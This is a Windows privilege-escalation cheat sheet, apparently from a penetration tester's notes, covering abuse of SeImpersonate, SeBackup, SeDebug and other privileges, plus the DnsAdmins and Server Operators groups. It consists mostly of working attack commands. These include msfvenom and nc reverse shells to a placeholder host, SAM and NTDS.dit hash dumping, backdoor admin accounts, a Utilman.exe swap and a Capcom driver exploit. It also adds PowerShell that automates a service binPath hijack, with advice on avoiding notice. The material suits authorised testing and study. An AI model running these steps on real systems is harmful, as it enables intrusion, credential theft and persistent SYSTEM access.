# Abusing Windows Privileges

## SeImpersonatePrivilege

```
whoami /priv | findstr SeImpersonate
```
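To triage every privilege covered on this page at once rather than grepping for one at a time, here is an added example (not code from the original page) that parses `whoami /priv` output and prints the abusable ones with the technique to try. It runs `whoami /priv` itself, or takes saved output via `-Text`; the sample in `$demo` is constructed, not captured from a real host, and the regex expects the English `Enabled`/`Disabled` state words.

```powershell
# Added example: map `whoami /priv` rows to the abuse techniques on this page.
function Get-AbusablePrivilege {
    param([string[]]$Text)

    # privilege name -> section on this page
    $map = @{
        'SeImpersonatePrivilege'  = 'Potato family (SharpEfsPotato / PrintSpoofer / JuicyPotato)'
        'SeBackupPrivilege'       = 'reg save SAM+SYSTEM; diskshadow + robocopy /B for NTDS.dit'
        'SeTcbPrivilege'          = 'Act as part of the OS (tcb.exe)'
        'SeManageVolumePrivilege' = 'SeManageVolumeExploit + tzres.dll hijack'
        'SeDebugPrivilege'        = 'Spawn child of winlogon.exe (psgetsys.ps1)'
        'SeRestorePrivilege'      = 'Rename protected files (Utilman.exe swap)'
        'SeLoadDriverPrivilege'   = 'Load vulnerable driver (Capcom.sys)'
    }

    if (-not $Text) { $Text = & whoami.exe /priv }   # live output when nothing was passed in

    foreach ($line in $Text) {
        # row layout: <Name>  <Description ...>  <Enabled|Disabled>  (English locale assumed)
        if ($line -match '^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$') {
            $name, $state = $Matches[1], $Matches[2]
            if ($map.ContainsKey($name)) {
                [pscustomobject]@{ Privilege = $name; State = $state; Technique = $map[$name] }
            }
        }
    }
}

# Constructed sample: what `whoami /priv` typically prints for an IIS application pool identity
$demo = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
'@ -split "`r?`n"

Get-AbusablePrivilege -Text $demo | Format-Table -AutoSize
```

On the constructed sample only `SeImpersonatePrivilege` is reported; run `Get-AbusablePrivilege` with no arguments on the target to see the live list. A `Disabled` state is not a blocker for the Potato tools, which enable the privilege in their own token.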

#### Exploitation

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell.exe

.\SharpEfsPotato.exe -p shell.exe
```

{% hint style="info" icon="lightbulb" %}

* Works in almost every case where the privilege is present in the token (typical for IIS, MSSQL and other service accounts); it does not have to show as `Enabled`, the tools enable it themselves
* Alternative tools: PrintSpoofer (needs the Print Spooler service running), JuicyPotato (older systems only; it no longer works on Windows 10 1809 / Server 2019 and later)
{% endhint %}

## SeBackupPrivilege

Typically held by members of the Backup Operators group. The privilege bypasses file ACLs for read access, but the registry hives and NTDS.dit are locked while Windows is running, so they are extracted with `reg save` (hives) or from a volume shadow copy (NTDS.dit).

### Method 1: Dump SAM & SYSTEM

```
mkdir C:\Temp

reg save hklm\sam C:\Temp\sam
reg save hklm\system C:\Temp\system
```

* Download `sam` and `system`, then extract the local account hashes offline with impacket-secretsdump or pypykatz (the SYSTEM hive holds the boot key needed to decrypt SAM)

```
pypykatz registry --sam sam system
secretsdump.py -sam sam -system system LOCAL
```

### Method 2: Dump NTDS.dit (Domain Controller)

NTDS.dit is held open by LSASS, so create a volume shadow copy and copy the file from there with backup semantics (`robocopy /B`).

#### Step 1: Create diskshadow script

```
# l1nuxkid.dsh
set context persistent nowriters
add volume c: alias ntds
create
expose %ntds% X:
```

```
unix2dos l1nuxkid.dsh
```

* Transfer l1nuxkid.dsh to the target Windows machine. diskshadow requires CRLF line endings (hence `unix2dos`) and must be run from a directory you can write to, e.g. `C:\Temp`

#### Step 2: Create the shadow copy and copy the files

```
diskshadow /s l1nuxkid.dsh

robocopy /B X:\Windows\NTDS . ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM
```

* Download ntds.dit and SYSTEM (the boot key from SYSTEM is required to decrypt the hashes), then extract offline

```
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
```

## SeTcbPrivilege

#### Exploitation

```
.\tcb.exe "C:\Windows\System32\cmd.exe /c net localgroup administrators l1nuxkid /add"
```

Reverse shell:

```
.\tcb.exe "C:\Windows\System32\cmd.exe /c nc.exe <IP> <PORT> -e cmd"
```

## DNSAdmins Group Abuse

```
whoami /groups
```

Members of DnsAdmins can point the DNS service at an arbitrary DLL through the `ServerLevelPluginDll` setting (stored under `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters`); the DNS service loads it as SYSTEM the next time it starts.

#### Step 1: Generate DLL

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=444 -f dll -o rev.dll
```

#### Step 2: Host DLL

```
impacket-smbserver share . -smb2support
```

#### Step 3: Register DLL (run against the DNS server; omit `<DC>` when running on it)

```
dnscmd <DC> /config /serverlevelplugindll \\<IP>\share\rev.dll
```

#### Step 4: Restart DNS Service

```
sc.exe \\<DC> stop dns
sc.exe \\<DC> start dns
```

{% hint style="info" %}

* Stopping/starting the service needs service-control rights on `dns`, which are not part of DnsAdmins membership itself; check with `sc.exe \\<DC> sdshow dns`, otherwise wait for a service restart or reboot
* A plain msfvenom DLL has none of the plugin exports the DNS server expects, so name resolution breaks while it is loaded: expect a DNS outage and clean up
* Cleanup: `dnscmd <DC> /config /serverlevelplugindll` with no path clears the setting (or delete the `ServerLevelPluginDll` registry value), then restart the service again
{% endhint %}

## Server Operators Group

```
net user <username>
```

* Check the `Local Group Memberships` / `Global Group memberships` lines for `Server Operators` (or use `whoami /groups`)

#### Exploitation (service abuse)

Server Operators can reconfigure and start services. Pick one that runs as LocalSystem (`sc.exe qc <service>` shows `SERVICE_START_NAME : LocalSystem`), replace its binary path with a command, and start it:

```
sc.exe config "VMTools" binPath= "C:\Windows\System32\cmd.exe /k net localgroup administrators <user> /add"

sc.exe start "VMTools"
```

* `sc.exe start` ends with error 1053 (the service did not respond) because cmd.exe is not a real service; the command has already run as SYSTEM by then
* Restore the original `binPath=` afterwards, otherwise the service stays broken
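An added example (not code from the original page) that does the discovery and cleanup the two commands above leave out: it lists services running as LocalSystem, and for a chosen one swaps the binary path for a command, starts it, and restores the original path in a `finally` block. Instead of `sc.exe config binPath=` it sets the path through the `Win32_Service.Change` WMI method, which avoids quoting problems when restoring a `PathName` that already contains quotes. Run it as a Server Operators member on the target; `-ServiceName` and `-Command` are placeholders.

```powershell
# Added example: service binPath hijack with candidate discovery and guaranteed restore.
param(
    [string]$ServiceName,   # e.g. 'VMTools'; omit to only list candidate services
    [string]$Command = "C:\Windows\System32\cmd.exe /c net localgroup administrators $env:USERNAME /add"
)

function Get-SystemService {
    # services whose process runs as NT AUTHORITY\SYSTEM when started
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' } |
        Select-Object Name, State, StartMode, PathName
}

function Set-ServicePath {
    param([Microsoft.Management.Infrastructure.CimInstance]$Service, [string]$Path)
    # Win32_Service.Change: ReturnValue 0 = success, 2 = access denied
    $r = Invoke-CimMethod -InputObject $Service -MethodName Change -Arguments @{ PathName = $Path }
    if ($r.ReturnValue -ne 0) { throw "Change('$Path') failed with code $($r.ReturnValue)" }
}

function Invoke-ServiceHijack {
    param([string]$Name, [string]$Cmd)
    $svc = Get-CimInstance Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { throw "service $Name not found" }
    if ($svc.StartName -ne 'LocalSystem') { throw "$Name runs as $($svc.StartName), not LocalSystem" }

    $original = $svc.PathName
    try {
        Set-ServicePath -Service $svc -Path $Cmd
        # cmd.exe never reports back to the SCM, so start returns error 1053 after the command ran
        & sc.exe start $Name | Out-Null
        Start-Sleep -Seconds 2
        & net.exe localgroup administrators   # verify the result of the default -Command
    } finally {
        Set-ServicePath -Service $svc -Path $original   # always put the real binary back
    }
}

if ($ServiceName) { Invoke-ServiceHijack -Name $ServiceName -Cmd $Command } else { Get-SystemService }
```

Run it once without arguments to pick a target, then again with `-ServiceName`. Prefer a service that is currently stopped, since a running one has to be stopped first and its outage is more likely to be noticed.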

## SeManageVolumePrivilege

#### Exploitation (DLL Hijacking)

SeManageVolumeExploit uses the privilege to grant the current user full control over `C:\` (including `C:\Windows\System32`), which turns it into a DLL hijack in a system directory.

```
.\EnableAllTokenPrivs.ps1
.\SeManageVolumeExploit.exe
```

#### Payload

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1337 -f dll -o tzres.dll

copy tzres.dll C:\Windows\System32\wbem\
```

#### Listener

```
nc -lvnp 1337
```

#### Trigger

* Run `systeminfo`: it loads `wbem\tzres.dll` and the payload executes
* The shell runs with the identity of whatever process loaded the DLL, so check `whoami` after connecting

## SeDebugPrivilege

#### Exploitation (Token Manipulation)

```
iwr http://<IP>/psgetsys.ps1 -o psgetsys.ps1
Import-Module .\psgetsys.ps1
```

#### Get SYSTEM via Parent Process

winlogon.exe runs as SYSTEM; with SeDebugPrivilege you can open it and spawn a child process that inherits its token. Note its PID:

```
Get-Process winlogon
```

```
[MyProcess]::CreateProcessFromParent("<PID>","C:\Windows\System32\cmd.exe","/c net user l1nuxkid Pass123! /add")

[MyProcess]::CreateProcessFromParent("<PID>","C:\Windows\System32\cmd.exe","/c net localgroup administrators l1nuxkid /add")
```

## SeRestorePrivilege

#### Exploitation

```
.\EnableSeRestorePrivilege.ps1
```

With the privilege enabled, write and rename operations bypass file ACLs, so a protected binary in System32 can be swapped for cmd.exe:

```
ren C:\Windows\System32\Utilman.exe Utilman.bak
ren C:\Windows\System32\cmd.exe Utilman.exe
```

#### Trigger

* Open an RDP connection and, at the logon screen (before authenticating), press Win + U
* Ease of Access launches the renamed cmd.exe as SYSTEM
* Restore afterwards: rename Utilman.exe back to cmd.exe and Utilman.bak back to Utilman.exe (cmd.exe is missing from System32 until you do)

## SeLoadDriverPrivilege

```
whoami /priv | findstr SeLoadDriverPrivilege
```

#### Exploitation (Capcom Driver)

The privilege allows loading a kernel driver from a service key the user controls (LoadDriver.exe creates it under HKCU), so load the signed but vulnerable Capcom.sys and use ExploitCapcom to run a payload as SYSTEM.

#### Upload:

* Capcom.sys
* ExploitCapcom.exe
* LoadDriver.exe
* nc.exe

#### Step 1: Prepare payload

The batch file must contain the nc command, not run it, so write it with `echo` and use the full path of the uploaded nc.exe:

```
echo C:\ProgramData\nc.exe <IP> 4444 -e cmd.exe > C:\ProgramData\shell.bat
```

#### Step 2: Load Driver

```
.\LoadDriver.exe System\CurrentControlSet\dfserv C:\Path\Capcom.sys
```

#### Step 3: Execute Exploit

```
.\ExploitCapcom.exe C:\ProgramData\shell.bat
```

{% hint style="info" %}

* LoadDriver.exe writes the service key under HKCU, so run it from an interactive session with a loaded user profile, and pass the absolute driver path
* Capcom.sys is on Microsoft's vulnerable driver blocklist; on hosts that enforce it (or run HVCI) the load fails
{% endhint %}

FINAL QUOTE FROM l1nuxkid:

> Only user more privileged than NT AUTHORITY\SYSTEM is Bill Gates

